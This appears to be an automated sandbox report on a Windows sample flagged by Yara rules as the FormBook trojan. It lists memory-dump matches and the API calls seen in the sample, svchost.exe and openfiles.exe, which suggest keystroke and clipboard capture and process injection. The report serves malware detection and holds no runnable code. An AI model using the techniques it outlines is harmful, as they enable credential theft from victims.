            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001F425A
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_001E0219
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_0020CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0020CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: This is a third-party compiled AutoIt script.0_2_00183B4C
            Source: F2024-202202.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: F2024-202202.exe, 00000000.00000000.2005644501.0000000000235000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_06596c19-9
            Source: F2024-202202.exe, 00000000.00000000.2005644501.0000000000235000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8cdabee3-8
            Source: F2024-202202.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6ecb0106-3
            Source: F2024-202202.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_af68acfe-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B043 NtCreateSection,2_2_0040B043
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A803 NtGetContextThread,2_2_0040A803
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C973 NtClose,2_2_0042C973
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B263 NtMapViewOfSection,2_2_0040B263
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA13 NtSetContextThread,2_2_0040AA13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BB33 NtDelayExecution,2_2_0040BB33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AC23 NtResumeThread,2_2_0040AC23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B493 NtCreateFile,2_2_0040B493
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A5F3 NtSuspendThread,2_2_0040A5F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040B6C3 NtReadFile,2_2_0040B6C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BF53 NtAllocateVirtualMemory,2_2_0040BF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,2_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F4650 NtSuspendThread,LdrInitializeThunk,5_2_044F4650
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F4340 NtSetContextThread,LdrInitializeThunk,5_2_044F4340
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2C60 NtCreateKey,LdrInitializeThunk,5_2_044F2C60
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_044F2C70
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_044F2CA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_044F2D10
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_044F2D30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2DD0 NtDelayExecution,LdrInitializeThunk,5_2_044F2DD0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_044F2DF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_044F2EE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_044F2E80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2F30 NtCreateSection,LdrInitializeThunk,5_2_044F2F30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2FE0 NtCreateFile,LdrInitializeThunk,5_2_044F2FE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2FB0 NtResumeThread,LdrInitializeThunk,5_2_044F2FB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2AD0 NtReadFile,LdrInitializeThunk,5_2_044F2AD0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2AF0 NtWriteFile,LdrInitializeThunk,5_2_044F2AF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2B60 NtClose,LdrInitializeThunk,5_2_044F2B60
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_044F2BE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_044F2BF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_044F2BA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F35C0 NtCreateMutant,LdrInitializeThunk,5_2_044F35C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F39B0 NtGetContextThread,LdrInitializeThunk,5_2_044F39B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2C00 NtQueryInformationProcess,5_2_044F2C00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2CC0 NtQueryVirtualMemory,5_2_044F2CC0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2CF0 NtOpenProcess,5_2_044F2CF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2D00 NtSetInformationFile,5_2_044F2D00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2DB0 NtEnumerateKey,5_2_044F2DB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2E30 NtWriteVirtualMemory,5_2_044F2E30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2EA0 NtAdjustPrivilegesToken,5_2_044F2EA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2F60 NtCreateProcessEx,5_2_044F2F60
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2F90 NtProtectVirtualMemory,5_2_044F2F90
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2FA0 NtQuerySection,5_2_044F2FA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2AB0 NtWaitForSingleObject,5_2_044F2AB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F2B80 NtQueryInformationFile,5_2_044F2B80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F3010 NtOpenDirectoryObject,5_2_044F3010
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F3090 NtSetValueKey,5_2_044F3090
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F3D70 NtOpenThread,5_2_044F3D70
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044F3D10 NtOpenProcessToken,5_2_044F3D10
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00159180 NtCreateFile,5_2_00159180
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_001592B0 NtReadFile,5_2_001592B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00159370 NtDeleteFile,5_2_00159370
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_001593F0 NtClose,5_2_001593F0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00159520 NtAllocateVirtualMemory,5_2_00159520
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_001E4021
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001D8858
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001E545F
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_0018E8000_2_0018E800
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001ADBB50_2_001ADBB5
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_0020804A0_2_0020804A
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_0018E0600_2_0018E060
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001941400_2_00194140
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A24050_2_001A2405
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B65220_2_001B6522
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_002006650_2_00200665
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B267E0_2_001B267E
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A283A0_2_001A283A
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001968430_2_00196843
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B89DF0_2_001B89DF
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00198A0E0_2_00198A0E
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B6A940_2_001B6A94
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00200AE20_2_00200AE2
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E8B130_2_001E8B13
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001DEB070_2_001DEB07
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001ACD610_2_001ACD61
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B70060_2_001B7006
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_0019710E0_2_0019710E
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001931900_2_00193190
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001812870_2_00181287
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A33C70_2_001A33C7
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001AF4190_2_001AF419
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001956800_2_00195680
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A16C40_2_001A16C4
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A78D30_2_001A78D3
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001958C00_2_001958C0
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A1BB80_2_001A1BB8
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B9D050_2_001B9D05
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_0018FE400_2_0018FE40
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A1FD00_2_001A1FD0
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001ABFE60_2_001ABFE6
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_014036B00_2_014036B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041806E2_2_0041806E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004180732_2_00418073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041187A2_2_0041187A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004118832_2_00411883
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012502_2_00401250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411AA32_2_00411AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033002_2_00403300
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FB232_2_0040FB23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC672_2_0040FC67
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025402_2_00402540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042ED432_2_0042ED43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027E02_2_004027E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
